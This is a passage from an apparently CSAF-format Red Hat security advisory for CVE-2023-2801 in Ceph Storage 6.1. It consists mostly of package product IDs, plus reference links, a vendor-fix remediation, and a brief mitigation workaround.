"9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2023-2801" }, { "category": "external", "summary": "RHBZ#2210840", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2210840" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2023-2801", "url": "https://www.cve.org/CVERecord?id=CVE-2023-2801" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-2801", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2801" }, { "category": "external", "summary": "https://grafana.com/security/security-advisories/cve-2023-2801/", "url": "https://grafana.com/security/security-advisories/cve-2023-2801/" } ], "release_date": "2023-06-06T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-12-12T13:59:00+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_ceph_storage/6\n\nFor supported configurations, refer to:\n\nhttps://access.redhat.com/articles/1548993", "product_ids": [ "9Base-RHCEPH-6.1-Tools:ceph-2:17.2.6-167.el9cp.src", "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-mib-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-resource-agents-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:cephadm-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:cephadm-ansible-1:2.18.0-1.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:cephadm-ansible-1:2.18.0-1.el9cp.src", "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:cephfs-top-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:7740" }, { "category": "workaround", "details": "Block mixed query requests and patch to disable mixed query concurrent calls", "product_ids": [ "9Base-RHCEPH-6.1-Tools:ceph-2:17.2.6-167.el9cp.src", "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-mib-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.ppc64le", 